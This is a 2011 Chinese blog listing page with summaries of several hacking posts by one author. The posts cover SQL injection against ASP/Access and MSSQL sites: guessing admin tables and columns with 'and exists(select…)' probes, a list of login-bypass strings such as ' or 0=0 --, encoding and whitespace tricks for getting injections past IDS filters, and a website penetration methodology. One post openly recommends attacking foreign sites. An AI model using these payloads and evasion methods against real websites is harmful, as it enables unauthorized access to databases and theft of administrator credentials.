上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 13 下一页
摘要: 1.and user>0 判断数据库类型(虽然刚才工具中已经判断出来了,但为了学习嘛,从最基本的来)看到回显中的Microsoft JET Database*** 错误我们可以断定是ACCESS数据库了2.and exists (select * from 表名) 猜解表名,返回错误说明表名不存在,返回正常说明表名存在这里我们输入 and exists (select * from admin)返回正常,说明我们输入的表明admin存在3.exists (select 列名 from 表名) 猜解列名,依然是返回错误说明列名不存在,返回正常说明列名存在这里我们输入and exists ( 阅读全文
posted @ 2011-06-07 00:46 WHaa_(T_T) 阅读(220) 评论(0) 推荐(0)
摘要: 简介:sql注入一般针对基于web平台的应用程序 由于很多时候程序员在编写程序的时候没有对浏览器端提交的参数进行合法的判断,可以由用户自己修改构造参数(也可以是sql查询语句),并传递至服务器端 获取想要的敏感信息甚至执行危险代码和系统命令就形成了sql注入漏洞,时至今日任然有很大一部分网站存在sql注入漏洞,可想而知sql注入攻击的危害,下面就目前sql注入攻击技术进行总结,让我们更加了解这种攻击与防御方法一、access数据库注入攻击技术目前国内很大一部分网站都是采用asp+access搭建成的本文演示网站是在虚拟机搭建的一套留言板程序http://192.168.80.128:8181/ 阅读全文
posted @ 2011-06-07 00:38 WHaa_(T_T) 阅读(737) 评论(0) 推荐(0)
摘要: 1.判断有无注入点' ; and 1=1 and 1=22.猜表: 常见的表:admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admin)and 1<(select count(*) from admin)4.猜 阅读全文
posted @ 2011-06-06 13:42 WHaa_(T_T) 阅读(339) 评论(0) 推荐(0)
摘要: 先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的"假是真时真是假",比lake2大哥哥的IP欺骗更经典哦,呵呵。 我们来构造测试语句:vpro.asp?id=1 or exists(select * from admin) 返回错误页面,说明存在admin表我们来换一个表试试!vpro.asp?id=1 or exists(select * from n0h4ck) 说明不存 阅读全文
posted @ 2011-06-06 12:59 WHaa_(T_T) 阅读(532) 评论(0) 推荐(0)
摘要: 表名和字段名的获得适用情况:1)数据库是MSSQL2)连接数据库的只是普通用户3)不知道ASP源代码可以进行的攻击1)对数据内容进行添加,查看,更改实例:本文件以为列进行测试攻击。第一步:在输入用户名处输入单引号,显示Microsoft OLE DB Provider for SQL Server 错误 80040e14 字符串 之前有未闭合的引号。 /user/wantpws.asp,行63 说明没有过滤单引号且数据库是MSSQL.第二步:输入a;use master;--显示Microsoft OLE DB Provider for SQL Server 错误 80040e21 多步LE 阅读全文
posted @ 2011-06-06 12:55 WHaa_(T_T) 阅读(245) 评论(0) 推荐(0)
摘要: 查看电脑自身信息c:\>systeminfo主机名: DEEPIN-E2939CCDOS 名称: Microsoft Windows XP ProfessionalOS 版本: 5.1.2600 Service Pack 2 Build 2600OS 制造商: Microsoft CorporationOS 配置: 独立工作站OS 构件类型: Uniprocessor Free注册的所有人: *注册的组织: DEEPIN产品 ID: 76481-640-8834005-23593初始安装日期: 1601-1-1, 0:00:00系统启动时间: 0 天 9 小时 7 分 9 秒系统制造商: 阅读全文
posted @ 2011-06-06 11:55 WHaa_(T_T) 阅读(322) 评论(0) 推荐(0)
摘要: 各国网站域名后缀名对我们 搞入侵的来说 经常要入侵些网站老搞本国的也不是很厚道 那就要知道各国网站域名后缀名就像.cn一样,不同国家有不同的缩写。通常都是根据英文名字而来。如uk带表英国,de带表德国,it带表意大利。 为方便各位做外贸的朋友查询,特搜集资料分享如下:国家域名 (按国家地区名称拼音排列)A阿尔巴尼亚 .al阿尔及利亚 .dz阿富汗 .af阿根廷 .ar阿拉伯联合酋长国 .ae阿鲁巴 .aw阿曼 .om阿塞拜疆 .az埃及 .eg埃塞俄比亚 .et爱尔兰 .ie爱沙尼亚 .ee安道尔 .ad安哥拉 .ao安圭拉 .ai安提瓜和巴布达 .ag奥地利 .at澳大利亚 .au澳门 .m 阅读全文
posted @ 2011-06-06 00:15 WHaa_(T_T) 阅读(23051) 评论(0) 推荐(0)
摘要: SQL injection strings(DB type doesn't matter)') OR ('a' = 'a') OR ('1'-'1'or''='' OR '1=1admin'--' or 0=0 --" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x' 阅读全文
posted @ 2011-06-02 12:17 WHaa_(T_T) 阅读(189) 评论(0) 推荐(0)
摘要: 写在前面:本文没有图,纯理论上做总结,2k字左右,不多,大家耐心点入侵存在运气的几率,我们只有不断的提高自己,才能够将运气的成分将到最小;方法是死的,人是活的,思路更是活的。我就算是抛砖引玉了,说一下我渗透的思路大家可以多多指正。开始渗透现在我们假定要渗透www.xxx.com我们首先要观察,观察网站的类型,这一步不是让你马上有漏洞什么的,而是做到对网站心中有数。大概有这么几种可能1、一眼望去基本全是flash的,看到这个信息,就要做好打持久战的准备了,此时可以用wvs扫一下站点目录,了解站点结构,还有就是扫描ftp弱口令,因为这种flash站很依靠ftp。有时候会遇到非常弱智的密码。2、首页 阅读全文
posted @ 2011-06-02 11:59 WHaa_(T_T) 阅读(367) 评论(0) 推荐(0)
摘要: 当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。如or 1=1即%6f%72%20%31%3d%31Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)二、 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我们可以把or ‘swords’之间的空格去掉 阅读全文
posted @ 2011-06-02 11:47 WHaa_(T_T) 阅读(183) 评论(0) 推荐(0)
上一页 1 ··· 3 4 5 6 7 8 9 10 11 ··· 13 下一页